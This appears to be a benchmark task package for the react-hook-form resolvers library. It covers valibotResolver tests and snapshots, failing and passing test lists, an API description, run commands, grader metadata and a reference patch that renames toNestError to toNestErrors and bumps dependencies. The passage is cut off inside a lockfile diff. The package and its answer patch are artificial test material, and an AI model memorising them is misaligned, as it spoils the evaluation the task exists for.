"non_optional": "Invalid type", + }, + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + "types": { + "number": "Like id is required", + }, + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + "types": { + "min_length": "Must be at least 8 characters in length", + "regex": [ + "One uppercase character", + "One lowercase character", + "One number", + ], + }, + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return all the errors from valibotResolver when validation fails with \`validateAllFieldCriteria\` set to true and \`mode: sync\` 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "birthYear": { + "message": "Please enter your birth year", + "ref": undefined, + "type": "number", + "types": { + "number": "Please enter your birth year", + }, + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, + "type": "email", + "types": { + "email": "Invalid email address", + }, + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + "types": { + "number": "Like id is required", + }, + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + "types": { + "min_length": "Must be at least 8 characters in length", + "regex": [ + "One uppercase character", + "One lowercase character", + "One number", + ], + }, + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return parsed values from valibotResolver with \`mode: sync\` when validation pass 1`] = ` +{ + "errors": {}, + "values": { + "accessToken": "accessToken", + "birthYear": 2000, + "email": "john@doe.com", + "enabled": true, + "like": { + "id": 1, + "name": "name", + }, + "password": "Password123_", + "repeatPassword": "Password123_", + "tags": [ + "tag1", + "tag2", + ], + "username": "Doe", + }, +} +`; diff --git a/valibot/src/__tests__/valibot.ts b/valibot/src/__tests__/valibot.ts index a7d5144..c91835f 100644 --- a/valibot/src/__tests__/valibot.ts +++ b/valibot/src/__tests__/valibot.ts @@ -1,9 +1,51 @@ /* eslint-disable no-console, @typescript-eslint/ban-ts-comment */ import { valibotResolver } from '..'; import { schema, validData, fields, invalidData } from './__fixtures__/data'; +import * as valibot from 'valibot'; const shouldUseNativeValidation = false; describe('valibotResolver', () => { + it('should return parsed values from valibotResolver with `mode: sync` when validation pass', async () => { + vi.mock('valibot', async () => { + const a = await vi.importActual<any>('valibot'); + return { + __esModule: true, + ...a, + }; + }); + const parseSpy = vi.spyOn(valibot, 'parse'); + const parseAsyncSpy = vi.spyOn(valibot, 'parseAsync'); + + const result = await valibotResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from valibotResolver with `mode: sync` when validation fails', async () => { + vi.mock('valibot', async () => { + const a = await vi.importActual<any>('valibot'); + return { + __esModule: true, + ...a, + }; + }); + const parseSpy = vi.spyOn(valibot, 'parse'); + const parseAsyncSpy = vi.spyOn(valibot, 'parseAsync'); + + const result = await valibotResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + it('should return values from valibotResolver when validation pass', async () => { const result = await valibotResolver(schema)(validData, undefined, { fields, @@ -21,4 +63,39 @@ describe('valibotResolver', () => { expect(result).toMatchSnapshot(); }); + + it('should return values from valibotResolver when validation pass & raw=true', async () => { + const result = await valibotResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toEqual({ errors: {}, values: validData }); + }); + + it('should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await valibotResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`', async () => { + const result = await valibotResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); });
[ "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`" ]
[ "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "src/__tests__/toNestObject.ts > transforms flat object to nested object", "src/__tests__/toNestObject.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typebox/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts" ]
Method: valibotResolver(schema, schemaOptions?, resolverOptions?) → async (values, _, options) ⇒ Promise<{ values: any; errors: FieldErrors }> Location: src/valibot.ts Inputs: - **schema** – `BaseSchema | BaseSchemaAsync` – the Valibot schema to validate against. - **schemaOptions** – optional object (default `{ abortEarly: false, abortPipeEarly: false }`) that configures Valibot parsing behaviour. - **resolverOptions** – optional object (default `{}`) with: - `mode?: 'async' | 'sync'` – selects `parseAsync` or `parse` for validation. - `raw?: boolean` – if true, the resolver returns the original `values` instead of the parsed result. - The returned async function receives: - `values` – the form values to validate. - `_` – unused context parameter (kept for RHF compatibility). - `options` – RHF resolver options (`fields`, `criteriaMode`, `shouldUseNativeValidation`, etc.). Outputs: - Resolves to an object `{ values, errors }` where: - `values` is either the parsed data (default) or the original `values` when `resolverOptions.raw` is true. - `errors` is a `FieldErrors` map built from Valibot `ValiError` issues; when `options.criteriaMode === 'all'` and native validation is not used, all error criteria are included. Description: `valibotResolver` creates a React‑Hook‑Form resolver that validates form data against a Valibot schema. It supports synchronous (`mode: 'sync'`) and asynchronous (`mode: 'async'`) validation, optional raw value return, and full‑criteria error collection when `criteriaMode: 'all'` is requested. Use it by passing the resolver to `useForm({ resolver: valibotResolver(schema) })` or with the additional options shown above.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 1, "num_modified_lines": 67, "pr_author": "jorisre", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding more tests, supporting `criteriaMode` (validateAllFieldCriteria) and reducing bundle size for the Valibot resolver. The provided test patch verifies those behaviors, including sync mode handling and criteriaMode errors, confirming alignment with the stated requirements. There are no signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge. Thus the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a9d319d43291d4f01616f5d5424c6b19dacdd4e7
2023-08-20 09:53:21
github-actions[bot]: **Size Change:** +364 B (+1%) **Total Size:** 25.4 kB | Filename | Size | Change | | | :--- | :---: | :---: | :---: | | `dist/resolvers.js` | 484 B | +125 B (+35%) | 🚨 | | `dist/resolvers.module.js` | 491 B | +118 B (+32%) | 🚨 | | `dist/resolvers.umd.js` | 575 B | +121 B (+27%) | 🚨 | <details><summary>ℹ️ <strong>View Unchanged</strong></summary> | Filename | Size | | :--- | :---: | | `ajv/dist/ajv.js` | 638 B | | `ajv/dist/ajv.module.js` | 597 B | | `ajv/dist/ajv.umd.js` | 751 B | | `arktype/dist/arktype.js` | 327 B | | `arktype/dist/arktype.module.js` | 343 B | | `arktype/dist/arktype.umd.js` | 422 B | | `class-validator/dist/class-validator.js` | 537 B | | `class-validator/dist/class-validator.module.js` | 561 B | | `class-validator/dist/class-validator.umd.js` | 640 B | | `computed-types/dist/computed-types.js` | 386 B | | `computed-types/dist/computed-types.module.js` | 401 B | | `computed-types/dist/computed-types.umd.js` | 477 B | | `io-ts/dist/io-ts.js` | 1.28 kB | | `io-ts/dist/io-ts.module.js` | 1.18 kB | | `io-ts/dist/io-ts.umd.js` | 1.41 kB | | `joi/dist/joi.js` | 592 B | | `joi/dist/joi.module.js` | 610 B | | `joi/dist/joi.umd.js` | 698 B | | `nope/dist/nope.js` | 345 B | | `nope/dist/nope.module.js` | 365 B | | `nope/dist/nope.umd.js` | 434 B | | `superstruct/dist/superstruct.js` | 324 B | | `superstruct/dist/superstruct.module.js` | 342 B | | `superstruct/dist/superstruct.umd.js` | 424 B | | `typanion/dist/typanion.js` | 323 B | | `typanion/dist/typanion.module.js` | 336 B | | `typanion/dist/typanion.umd.js` | 418 B | | `typebox/dist/typebox.js` | 464 B | | `typebox/dist/typebox.module.js` | 482 B | | `typebox/dist/typebox.umd.js` | 579 B | | `valibot/dist/valibot.js` | 577 B | | `valibot/dist/valibot.module.js` | 594 B | | `valibot/dist/valibot.umd.js` | 684 B | | `vest/dist/vest.js` | 480 B | | `vest/dist/vest.module.js` | 443 B | | `vest/dist/vest.umd.js` | 569 B | | `yup/dist/yup.js` | 626 B | | `yup/dist/yup.module.js` | 640 B | | `yup/dist/yup.umd.js` | 729 B | | `zod/dist/zod.js` | 581 B | | `zod/dist/zod.module.js` | 602 B | | `zod/dist/zod.umd.js` | 688 B | </details> <a href="https://github.com/preactjs/compressed-size-action"><sub>compressed-size-action</sub></a>
react-hook-form__resolvers-621
diff --git a/.vscode/settings.json b/.vscode/settings.json index eaf6a64..eb5a19a 100644 --- a/.vscode/settings.json +++ b/.vscode/settings.json @@ -5,7 +5,7 @@ "typescript", "typescriptreact" ], - "prettier.configPath": "./.prettierrc.js", + "prettier.configPath": "./prettier.config.cjs", "editor.formatOnSave": true, "editor.codeActionsOnSave": { "source.fixAll.eslint": true diff --git a/ajv/src/ajv.ts b/ajv/src/ajv.ts index b3de2c6..7d4d20c 100644 --- a/ajv/src/ajv.ts +++ b/ajv/src/ajv.ts @@ -1,4 +1,4 @@ -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import Ajv, { DefinedError } from 'ajv'; import ajvErrors from 'ajv-errors'; import { appendErrors, FieldError } from 'react-hook-form'; @@ -76,7 +76,7 @@ export const ajvResolver: Resolver = ? { values, errors: {} } : { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( validate.errors as DefinedError[], !options.shouldUseNativeValidation && diff --git a/arktype/src/arktype.ts b/arktype/src/arktype.ts index 4bba328..d42f002 100644 --- a/arktype/src/arktype.ts +++ b/arktype/src/arktype.ts @@ -1,5 +1,5 @@ import { FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; import { Problems } from 'arktype'; @@ -28,7 +28,7 @@ export const arktypeResolver: Resolver = if (result.problems) { return { values: {}, - errors: toNestError(parseErrorSchema(result.problems), options), + errors: toNestErrors(parseErrorSchema(result.problems), options), }; } diff --git a/class-validator/src/class-validator.ts b/class-validator/src/class-validator.ts index 4f9464b..cd10370 100644 --- a/class-validator/src/class-validator.ts +++ b/class-validator/src/class-validator.ts @@ -1,5 +1,5 @@ import { FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { plainToClass } from 'class-transformer'; import { validate, validateSync, ValidationError } from 'class-validator'; import type { Resolver } from './types'; @@ -47,7 +47,7 @@ export const classValidatorResolver: Resolver = if (rawErrors.length) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrors( rawErrors, !options.shouldUseNativeValidation && diff --git a/computed-types/src/computed-types.ts b/computed-types/src/computed-types.ts index f84b48a..1cf1306 100644 --- a/computed-types/src/computed-types.ts +++ b/computed-types/src/computed-types.ts @@ -1,5 +1,5 @@ import type { FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; import type { ValidationError } from 'computed-types'; @@ -33,7 +33,7 @@ export const computedTypesResolver: Resolver = if (isValidationError(error)) { return { values: {}, - errors: toNestError(parseErrorSchema(error), options), + errors: toNestErrors(parseErrorSchema(error), options), }; } diff --git a/io-ts/src/io-ts.ts b/io-ts/src/io-ts.ts index 8abb0d9..c03c1e0 100644 --- a/io-ts/src/io-ts.ts +++ b/io-ts/src/io-ts.ts @@ -1,6 +1,6 @@ import * as Either from 'fp-ts/Either'; import { pipe } from 'fp-ts/function'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import errorsToRecord from './errorsToRecord'; import { Resolver } from './types'; @@ -13,7 +13,7 @@ export const ioTsResolver: Resolver = (codec) => (values, _context, options) => !options.shouldUseNativeValidation && options.criteriaMode === 'all', ), ), - Either.mapLeft((errors) => toNestError(errors, options)), + Either.mapLeft((errors) => toNestErrors(errors, options)), Either.fold( (errors) => ({ values: {}, diff --git a/joi/src/joi.ts b/joi/src/joi.ts index 29f6938..5b4baf4 100644 --- a/joi/src/joi.ts +++ b/joi/src/joi.ts @@ -1,5 +1,5 @@ import { appendErrors, FieldError } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { ValidationError } from 'joi'; import { Resolver } from './types'; @@ -61,7 +61,7 @@ export const joiResolver: Resolver = if (result.error) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( result.error, !options.shouldUseNativeValidation && diff --git a/nope/src/nope.ts b/nope/src/nope.ts index c212e6c..dc9b5bc 100644 --- a/nope/src/nope.ts +++ b/nope/src/nope.ts @@ -1,5 +1,5 @@ -import type {FieldError, FieldErrors} from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import type { FieldError, FieldErrors } from 'react-hook-form'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { ShapeErrors } from 'nope-validator/lib/cjs/types'; import type { Resolver } from './types'; @@ -37,7 +37,7 @@ export const nopeResolver: Resolver = | undefined; if (result) { - return { values: {}, errors: toNestError(parseErrors(result), options) }; + return { values: {}, errors: toNestErrors(parseErrors(result), options) }; } options.shouldUseNativeValidation && validateFieldsNatively({}, options); diff --git a/package.json b/package.json index 1d89e3c..0f97fa7 100644 --- a/package.json +++ b/package.json @@ -209,10 +209,10 @@ "devDependencies": { "@sinclair/typebox": "^0.31.1", "@testing-library/dom": "^9.3.1", - "@testing-library/jest-dom": "^6.0.0", + "@testing-library/jest-dom": "^6.0.1", "@testing-library/react": "^14.0.0", "@testing-library/user-event": "^14.4.3", - "@types/node": "^20.5.0", + "@types/node": "^20.5.1", "@types/react": "^18.2.20", "@typescript-eslint/eslint-plugin": "^6.4.0", "@typescript-eslint/parser": "^6.4.0", @@ -251,9 +251,9 @@ "vest": "^4.6.11", "vite": "^4.4.9", "vite-tsconfig-paths": "^4.2.0", - "vitest": "^0.34.1", + "vitest": "^0.34.2", "yup": "^1.2.0", - "zod": "^3.22.1" + "zod": "^3.22.2" }, "peerDependencies": { "react-hook-form": "^7.0.0" diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index 1a23c38..1dedec4 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -12,8 +12,8 @@ devDependencies: specifier: ^9.3.1 version: 9.3.1 '@testing-library/jest-dom': - specifier: ^6.0.0 - version: 6.0.0(vitest@0.34.1) + specifier: ^6.0.1 + version: 6.0.1(vitest@0.34.2) '@testing-library/react': specifier: ^14.0.0 version: 14.0.0(react-dom@18.2.0)(react@18.2.0) @@ -21,8 +21,8 @@ devDependencies: specifier: ^14.4.3 version: 14.4.3(@testing-library/dom@9.3.1) '@types/node': - specifier: ^20.5.0 - version: 20.5.0 + specifier: ^20.5.1 + version: 20.5.1 '@types/react': specifier: ^18.2.20 version: 18.2.20 @@ -133,19 +133,19 @@ devDependencies: version: 4.6.11 vite: specifier: ^4.4.9 - version: 4.4.9(@types/node@20.5.0) + version: 4.4.9(@types/node@20.5.1) vite-tsconfig-paths: specifier: ^4.2.0 version: 4.2.0(typescript@5.1.6)(vite@4.4.9) vitest: - specifier: ^0.34.1 - version: 0.34.1(jsdom@22.1.0) + specifier: ^0.34.2 + version: 0.34.2(jsdom@22.1.0) yup: specifier: ^1.2.0 version: 1.2.0 zod: - specifier: ^3.22.1 - version: 3.22.1 + specifier: ^3.22.2 + version: 3.22.2 packages: @@ -1915,8 +1915,8 @@ packages: pretty-format: 27.5.1 dev: true - /@testing-library/jest-dom@6.0.0(vitest@0.34.1): - resolution: {integrity: sha512-Ye2R3+/oM27jir8CzYPmuWdavTaKwNZcu0d22L9pO/vnOYE0wmrtpw79TQJa8H6gV8/i7yd+pLaqeLlA0rTMfg==} + /@testing-library/jest-dom@6.0.1(vitest@0.34.2): + resolution: {integrity: sha512-0hx/AWrJp8EKr8LmC5jrV3Lx8TZySH7McU1Ix2czBPQnLd458CefSEGjZy7w8kaBRA6LhoPkGjoZ3yqSs338IQ==} engines: {node: '>=14', npm: '>=6', yarn: '>=1'} peerDependencies: '@jest/globals': '>= 28' @@ -1941,7 +1941,7 @@ packages: dom-accessibility-api: 0.5.16 lodash: 4.17.21 redent: 3.0.0 - vitest: 0.34.1(jsdom@22.1.0) + vitest: 